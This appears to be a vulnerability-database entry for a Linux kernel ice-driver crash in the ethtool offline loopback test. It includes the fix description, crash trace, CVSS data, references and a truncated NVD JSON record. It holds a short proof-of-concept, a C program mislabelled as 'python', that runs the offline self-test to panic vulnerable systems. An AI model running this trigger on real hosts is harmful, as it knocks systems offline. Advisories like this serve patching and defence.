CVE-2026-23353

Description

In the Linux kernel, the following vulnerability has been resolved: ice: fix crash in ethtool offline loopback test Since the conversion of ice to page pool, the ethtool loopback test crashes: BUG: kernel NULL pointer dereference, address: 000000000000000c #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 1100f1067 P4D 0 Oops: Oops: 0002 [#1] SMP NOPTI CPU: 23 UID: 0 PID: 5904 Comm: ethtool Kdump: loaded Not tainted 6.19.0-0.rc7.260128g1f97d9dcf5364.49.eln154.x86_64 #1 PREEMPT(lazy) Hardware name: [...] RIP: 0010:ice_alloc_rx_bufs+0x1cd/0x310 [ice] Code: 83 6c 24 30 01 66 41 89 47 08 0f 84 c0 00 00 00 41 0f b7 dc 48 8b 44 24 18 48 c1 e3 04 41 bb 00 10 00 00 48 8d 2c 18 8b 04 24 <89> 45 0c 41 8b 4d 00 49 d3 e3 44 3b 5c 24 24 0f 83 ac fe ff ff 44 RSP: 0018:ff7894738aa1f768 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000000 RSI: 0000000000000700 RDI: 0000000000000000 RBP: 0000000000000000 R08: ff16dcae79880200 R09: 0000000000000019 R10: 0000000000000001 R11: 0000000000001000 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000000000 R15: ff16dcae6c670000 FS: 00007fcf428850c0(0000) GS:ff16dcb149710000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000000000000c CR3: 0000000121227005 CR4: 0000000000773ef0 PKRU: 55555554 Call Trace: <TASK> ice_vsi_cfg_rxq+0xca/0x460 [ice] ice_vsi_cfg_rxqs+0x54/0x70 [ice] ice_loopback_test+0xa9/0x520 [ice] ice_self_test+0x1b9/0x280 [ice] ethtool_self_test+0xe5/0x200 __dev_ethtool+0x1106/0x1a90 dev_ethtool+0xbe/0x1a0 dev_ioctl+0x258/0x4c0 sock_do_ioctl+0xe3/0x130 __x64_sys_ioctl+0xb9/0x100 do_syscall_64+0x7c/0x700 entry_SYSCALL_64_after_hwframe+0x76/0x7e [...] It crashes because we have not initialized libeth for the rx ring. Fix it by treating ICE_VSI_LB VSIs slightly more like normal PF VSIs and letting them have a q_vector. It's just a dummy, because the loopback test does not use interrupts, but it contains a napi struct that can be passed to libeth_rx_fq_create() called from ice_vsi_cfg_rxq() -> ice_rxq_pp_create().

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.19:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:* - VULNERABLE

Linux Kernel < commit 85c98b81849e4724ae99005a6cccd33cab9cfd18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-23353
 * Trigger: Execute ethtool offline loopback test on vulnerable ice driver.
 * Impact: Kernel NULL pointer dereference leading to system crash (DoS).
 * Compile: gcc -o poc_cve_2026_23353 poc_cve_2026_23353.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char cmd[256];
    char interface[32];

    if (argc < 2) {
        printf("Usage: %s <interface_name>\n", argv[0]);
        printf("Example: %s eth0\n", argv[0]);
        return 1;
    }

    strncpy(interface, argv[1], sizeof(interface) - 1);
    interface[sizeof(interface) - 1] = '\0';

    printf("[+] Attempting to trigger CVE-2026-23353 on interface: %s\n", interface);
    printf("[+] Executing offline loopback test...\n");

    // The vulnerability is triggered by the offline self-test which calls ice_loopback_test
    snprintf(cmd, sizeof(cmd), "/sbin/ethtool -t %s offline", interface);

    // Execute the command. This will cause a kernel Oops/panic on vulnerable systems.
    int ret = system(cmd);

    if (ret == -1) {
        perror("system failed");
        return 1;
    }

    printf("[+] Command executed. If the system crashes, the vulnerability is present.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23353
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23353
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23353/
[4] VulDB https://vuldb.com/cve/CVE-2026-23353
[5] https://git.kernel.org/stable/c/85c98b81849e4724ae99005a6cccd33cab9cfd18
[6] https://git.kernel.org/stable/c/a9c354e656597aededa027d63d2ff0973f6b033f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23353", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:33.817", "lastModified": "2026-04-24T17:45:52.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix crash in ethtool offline loopback test\n\nSince the conversion of ice to page pool, the ethtool loopback test\ncrashes:\n\n BUG: kernel NULL pointer dereference, address: 000000000000000c\n #PF: supervisor write access in kernel mode\n #PF: error_code(0x0002) - not-present page\n PGD 1100f1067 P4D 0\n Oops: Oops: 0002 [#1] SMP NOPTI\n CPU: 23 UID: 0 PID: 5904 Comm: ethtool Kdump: loaded Not tainted 6.19.0-0.rc7.260128g1f97d9dcf5364.49.eln154.x86_64 #1 PREEMPT(lazy)\n Hardware name: [...]\n RIP: 0010:ice_alloc_rx_bufs+0x1cd/0x310 [ice]\n Code: 83 6c 24 30 01 66 41 89 47 08 0f 84 c0 00 00 00 41 0f b7 dc 48 8b 44 24 18 48 c1 e3 04 41 bb 00 10 00 00 48 8d 2c 18 8b 04 24 <89> 45 0c 41 8b 4d 00 49 d3 e3 44 3b 5c 24 24 0f 83 ac fe ff ff 44\n RSP: 0018:ff7894738aa1f768 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000\n RDX: 0000000000000000 RSI: 0000000000000700 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ff16dcae79880200 R09: 0000000000000019\n R10: 0000000000000001 R11: 0000000000001000 R12: 0000000000000000\n R13: 0000000000000000 R14: 0000000000000000 R15: ff16dcae6c670000\n FS: 00007fcf428850c0(0000) GS:ff16dcb149710000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 000000000000000c CR3: 0000000121227005 CR4: 0000000000773ef0\n PKRU: 55555554\n Call Trace:\n <TASK>\n ice_vsi_cfg_rxq+0xca/0x460 [ice]\n ice_vsi_cfg_rxqs+0x54/0x70 [ice]\n ice_loopback_test+0xa9/0x520 [ice]\n ice_self_test+0x1b9/0x280 [ice]\n ethtool_self_test+0xe5/0x200\n __dev_ethtool+0x1106/0x1a90\n dev_ethtool+0xbe/0x1a0\n dev_ioctl+0x258/0x4c0\n sock_do_ioctl+0xe3/0x130\n __x64_sys_ioctl+0xb9/0x100\n do_syscall_64+0x7c/0x700\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n\nIt crashes because we have not initialized libeth for the rx ring.\n\nFix it by treating ICE_VSI_LB VSIs slightly more like normal PF VSIs and\nletting them have a q_vector. It's just a dummy, because the loopback\ntest does not use interrupts, but it contains a napi struct that can be\npassed to libeth_rx_fq_create() called from ice_vsi_cfg_rxq() ->\nice_rxq_pp_create()."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nice: corrige un fallo en la prueba de bucle invertido fuera de línea de ethtool\n\nDesde la conversión de ice a 'page pool', la prueba de bucle invertido de ethtool falla:\n\n ERROR: desreferencia de puntero NULL del kernel, dirección: 000000000000000c\n #PF: acceso de escritura de supervisor en modo kernel\n #PF: código de error(0x0002) - página no presente\n PGD 1100f1067 P4D 0\n Oops: Oops: 0002 [#1] SMP NOPTI\n CPU: 23 UID: 0 PID: 5904 Comando: ethtool Kdump: cargado No contaminado 6.19.0-0.rc7.260128g1f97d9dcf5364.49.eln154.x86_64 #1 PREEMPT(lazy)\n Nombre del hardware: [...]\n RIP: 0010:ice_alloc_rx_bufs+0x1cd/0x310 [ice]\n Código: 83 6c 24 30 01 66 41 89 47 08 0f 84 c0 00 00 00 41 0f b7 dc 48 8b 44 24 18 48 c1 e3 04 41 bb 00 10 00 00 48 8d 2c 18 8b 04 24 <89> 45 0c 41 8b 4d 00 49 d3 e3 44 3b 5c 24 24 0f 83 ac fe ff ff 44\n RSP: 0018:ff7894738aa1f768 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000\n RDX: 0000000000000000 RSI: 0000000000000700 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ff16dcae79880200 R09: 0000000000000019\n R10: 0000000000000001 R11: 0000000000001000 R12: 0000000000000000\n R13: 0000000000000000 R14: 0000000000000000 R15: ff16dcae6c670000\n FS: 00007fcf428850c0(0000) GS:ff16dcb149710000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 000000000000000c CR3: 0000000121227005 CR4: 0000000000773ef0\n PKRU: 55555554\n Traza de Llamada:\n \n ice_vsi_cfg_rxq+0xca/0x460 [ice]\n ice_vsi_cfg_rxqs+0x54/0x70 [ice]\n ice_loopback_test+0xa9/0x520 [ice]\n ice_self_test+0x1b9/0x280 [ice]\n ethtool_self_test+0xe5/0x200\n __dev_ethtool+0x1106/0x1a90\n dev_ethtool+0xbe/0x1a0\n dev_ioctl+0x258/0x4c0\n sock_do_ioctl+0xe3/0x130\n __x64_sys_ioctl+0xb9/0x100\n do_syscall_64+0x7c/0x700\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n\nFalla porque no hemos inicializado 'libeth' para el anillo rx.\n\nSe soluciona tratando las VSIs ICE_VSI_LB un poco más como VSIs PF normales y permitiéndoles tener un 'q_vector'. Es solo un 'dummy', porque la prueba de bucle invertido no usa interrupciones, pero contiene una estructura 'napi' que puede pasarse a 'libeth_rx_fq_create()' llamada desde 'ice_vsi_cfg_rxq()' -> 'ice_rxq_pp_create()'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L ... (truncated)